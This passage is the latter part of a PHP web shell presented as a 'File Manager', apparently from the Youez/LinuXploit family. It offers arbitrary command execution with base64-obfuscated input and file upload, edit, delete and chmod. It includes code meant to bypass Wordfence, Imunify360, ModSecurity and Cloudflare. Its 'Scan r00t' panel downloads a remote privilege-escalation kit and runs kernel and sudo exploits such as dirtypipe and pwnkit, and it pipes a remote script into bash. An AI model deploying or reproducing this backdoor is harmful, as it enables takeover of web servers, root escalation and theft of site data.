        $responseMessage = deleteFile($file);
} elseif (is_dir($file)) {
        $responseMessage = deleteFolder($file);
        } else {
        $errorMessage = '<script>Swal.fire({title: "Oops...",text: "Mungkin file / folder ini sudah di hapus",icon: "info"});</script>';
                }
        }
}
// katanya bypass
if (function_exists('litespeed_request_headers')) {
        $headers = litespeed_request_headers();
if (isset($headers['X-LSCACHE'])) {
        header('X-LSCACHE: off');
        }
}

if (defined('WORDFENCE_VERSION')) {
        define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true);
        define('WORDFENCE_DISABLE_FILE_MODS', true);
}

if (function_exists('imunify360_request_headers') && defined('IMUNIFY360_VERSION')) {
        $imunifyHeaders = imunify360_request_headers();
if (isset($imunifyHeaders['X-Imunify360-Request'])) {
        header('X-Imunify360-Request: bypass');
        }
if (isset($imunifyHeaders['X-Imunify360-Captcha-Bypass'])) {
        header('X-Imunify360-Captcha-Bypass: ' . $imunifyHeaders['X-Imunify360-Captcha-Bypass']);
        }
}


if (function_exists('apache_request_headers')) {
        $apacheHeaders = apache_request_headers();
if (isset($apacheHeaders['X-Mod-Security'])) {
        header('X-Mod-Security: ' . $apacheHeaders['X-Mod-Security']);
        }
}

if (isset($_SERVER['HTTP_CF_CONNECTING_IP']) && defined('CLOUDFLARE_VERSION')) {
        $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP'];
if (isset($apacheHeaders['HTTP_CF_VISITOR'])) {
        header('HTTP_CF_VISITOR: ' . $apacheHeaders['HTTP_CF_VISITOR']);
        }
}
?>
<!DOCTYPE html>
<html>
<head>
        <title>File Manager</title>
        <meta name="viewport" content="width=device-width, initial-scale=0.5">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet">
        <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.15.3/css/all.css">
        <link href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-dark@4/dark.css" rel="stylesheet">
        <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11/dist/sweetalert2.min.js"></script>
        <link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono" rel="stylesheet">
</head>
<style>
* {
        font-family: Ubuntu Mono;
}
a {
        text-decoration: none;
}
a:hover {
        color: white;
}
</style>
<?php if (isset($_GET['info'])) {
?>
<body class="bg-dark"><button type="button" class="btn btn-outline-light" onclick="history.go(-1)"><i class="fad fa-backward"></i> Go Back</button>
</body>
<?php phpinfo();die();}?>
<body class="bg-dark text-light">
        <div class="container-fluid">
                <div class="py-3" id="main">
                        <div class="box shadow bg-dark p-4 rounded-3">
                                <h3><i class="fad fa-bug"></i>&nbsp;File Manager</h3>
                                <div class="table-responsive"><?php showBreadcrumb($currentDirectory); ?></div>
                        <div class="btn-group my-3">
                                <a class="btn btn-outline-light btn-sm" href="?"><i class="fad fa-home"></i>&nbsp;Home</a>
                                <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($currentDirectory); ?>&up"><i class="fad fa-upload"></i>&nbsp;Upload</a>
                                <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($currentDirectory); ?>&cmd"><i class="fad fa-terminal"></i>&nbsp;Cmd</a>
                                <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($currentDirectory); ?>&info"><i class="fad fa-info"></i>&nbsp;Info</a>
                                <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($currentDirectory); ?>&root"><i class="fad fa-search"></i>&nbsp;Scan r00t</a>
                                <a class="btn btn-outline-light btn-sm" href="?d=<?php echo urlencode($currentDirectory); ?>&out"><i class="fad fa-sign-out-alt"></i></i>&nbsp;Logout</a>
                        </div>
                <?php if (!empty($errorMessage)) {
                        echo $errorMessage;
                } ?>
                </div>
        </div>
</div>
<!-- respon nya -->
<?php if (!empty($responseMessage)) { ?>
<?php echo $responseMessage; } ?>

<?php
if (isset($_GET['read'])) {
$file = $_GET['read'];
$content = readFileContent($file);
if ($content !== false) {
?>
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <div class="mb-3">
                        <h5><i class="fad fa-file"></i>:<?php echo basename($file); ?></h5>
                        <textarea class="form-control form-control-sm mb-3" rows="7"><?php echo htmlspecialchars($content);?></textarea>
                </div>
        </div>
</div>
<?php
        } else {
        echo '<script>Swal.fire({title: "Oops..",text: "Kemungkinan file tidak ada",icon: "info"});</script>';
        }
die();
}
?>
<!-- Upload -->
<?php if (isset($_GET['up'])) { ?>
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <div class='mb-3'>
                        <h5><i class="fad fa-upload"></i>&nbsp;Upload</h5>
                        <form method="post" enctype="multipart/form-data">
                                <div class='input-group'>
                                        <input class='form-control form-control-sm' type="file" name="file">
                                        <button class='btn btn-outline-light btn-sm' type="submit" name="upload">Upload</button>
                                </div>
                        </form>
                </div>
        </div>
</div>
<?php die(); ?>
<?php } ?>
<!-- Logout -->
<?php if (isset($_GET['out'])) {
logout();
?>
<?php } ?>
<!-- Logout -->
<?php if (isset($_GET['root'])) { ?>
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <div class='text-center'>
                        <div class='btn-group mb-3'>
                                <a class='btn btn-outline-light btn-sm' href='<?php echo $_SERVER['REQUEST_URI'];?>&id_two=autoscan'><i class='fad fa-bug'></i>&nbsp;Auto scan r00t</a>
                                <a class='btn btn-outline-light btn-sm' href='<?php echo $_SERVER['REQUEST_URI'];?>&id_two=scansd'><i class="fad fa-search"></i>&nbsp;Scan SUID</a>
                                <a class='btn btn-outline-light btn-sm' href='<?php echo $_SERVER['REQUEST_URI'];?>&id_two=esg'><i class="fad fa-search"></i>&nbsp;Exploit suggester</a>
                        </div>
                </div>
                        <?php
                        if (!function_exists("proc_open")) {
                                echo "<div class='text-center'>Command is Disabled !</div>";
                        }
                        if (!is_writable($currentDirectory)) {
                                echo "<div class='text-center'>Current Directory is Unwriteable !</div>";
                        }
                        if (isset($_GET['id_two']) && $_GET['id_two'] == "autoscan") {
                                if (!file_exists($currentDirectory."/rooting/")) {
                                        mkdir($currentDirectory."/rooting");
                                        exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $currentDirectory."/rooting");
                                        exe_root("tar -xf auto.tar.gz", $currentDirectory."/rooting");
                                        if (!file_exists($currentDirectory."/rooting/netfilter")) {
                                                die("<div class='text-center'>Failed to Download Material !</div>");
                                        }
                                }
                                echo '<pre style="font-size:10px;">Netfilter : '.exe_root("timeout 10 ./rooting/netfilter", $currentDirectory).'Ptrace : '.exe_root("echo id | timeout 10 ./rooting/ptrace", $currentDirectory).'Sequoia : '.exe_root("timeout 10 ./rooting/sequoia", $currentDirectory).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs", $currentDirectory."/rooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $currentDirectory).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y", $currentDirectory).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit", $currentDirectory."/rooting").'</pre>';
                        } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "scansd") {
                                echo '<center class="anu">[+] Scanning ...</center>';
                                echo '<kbd><pre style="font-size:10px;">'.exe_root("find / -perm -u=s -type f 2>/dev/null", $currentDirectory).'</pre>';
                        } elseif (isset($_GET['id_two']) && $_GET['id_two'] == "esg") {
                                echo '<center class="anu">[+] Loading ...</center>';
                                echo '<pre style="font-size:10px;">'.exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $currentDirectory).'</pre>';
                        }
                ?>
        </div>
</div>
<?php die(); ?>
<?php } ?>
<!-- Cmd -->
<?php if (isset($_GET['cmd'])) { ?>
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <form method="post" onsubmit="document.getElementById('komendnya').value = btoa(btoa(btoa(document.getElementById('komendnya').value)))">
                        <div class="mb-3">
                                <h5><i class="fad fa-terminal"></i>&nbsp;Cmd Base64</h5>
                                <div class="input-group">
                                        <input type="text" class="form-control form-control-sm" name="komend" id="komendnya" placeholder="whoami">
                                        <button class="btn btn-outline-light" type="submit" name="eksekomend" value="<?php $komen;?>">Submit</button>
                                </div>
                        </div>
                </form><?php if (isset($_POST['eksekomend'])) {ekse($_POST['komend']);}?>
        </div>
</div>
<?php die(); ?>
<?php } ?>
<!-- Renme file / folder -->
<?php if (isset($_GET['rename'])) { ?>
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <h5><i class="fad fa-file"></i>:<?php echo basename($file); ?></h5>
                <form method="post">
                        <div class="input-group mb-3">
                                <input class="form-control form-control-sm" type="text" name="new_name" placeholder="New Name" required>
                                <input class="btn btn-outline-light btn-sm"  type="submit" value="Rename">
                        </div>
                </form>
        </div>
</div>
<?php die(); ?>
<?php } ?>
<!-- Edit file -->
<?php if (isset($_GET['edit'])) { ?>
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <div class="mb-3">
                        <h5><i class="fad fa-file"></i>:<?php echo basename($file); ?></h5>
                        <form method="post">
                                <textarea class="form-control form-control-sm mb-3" name="content" rows="7"><?php echo htmlspecialchars($content); ?></textarea>
                                <div class="d-grid gap-2">
                                        <button class="btn btn-outline-light btn-sm" type="submit">Save</button>
                                </div>
                        </form>
                </div>
        </div>
</div>
<?php die(); ?>
<?php } elseif (isset($_GET['chmod'])) { ?>
<!-- Chmod file / folder -->
<div class="container-fluid">
        <div class="box shadow bg-dark p-4 rounded-3">
                <h5><i class="fad fa-file"></i>:<?php echo basename($file); ?></h5>
                <form method="post">
                <div class="input-group mb-3">
                        <input type="hidden" name="chmod" value="<?php echo urlencode($file); ?>">
                        <input class="form-control form-control-sm" type="text" name="permission" placeholder="Enter permission (e.g., 0770)">
                        <button class="btn btn-outline-light btn-sm" type="submit">Change</button>
                </div>
                </form>
        </div>
</div>
<?php die(); ?>
<?php } ?>
<div class="container-fluid">
        <div class="py-3" id="main">
                <div class="box shadow bg-dark p-4 rounded-3">
                <?php showFileTable($currentDirectory);?>
                </div>
        </div>
</div>
<div class="container-fluid text-center">
        <div class="box shadow bg-dark p-4 rounded-3">
                <p>&copy; <?php echo date("Y"); ?> <a href="/cdn-cgi/l/email-protection#7401150d15424542341319151d185a171b19"><i class="fad fa-bug"></i></a>&nbsp;File Manager</p>
        </div>
</div>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit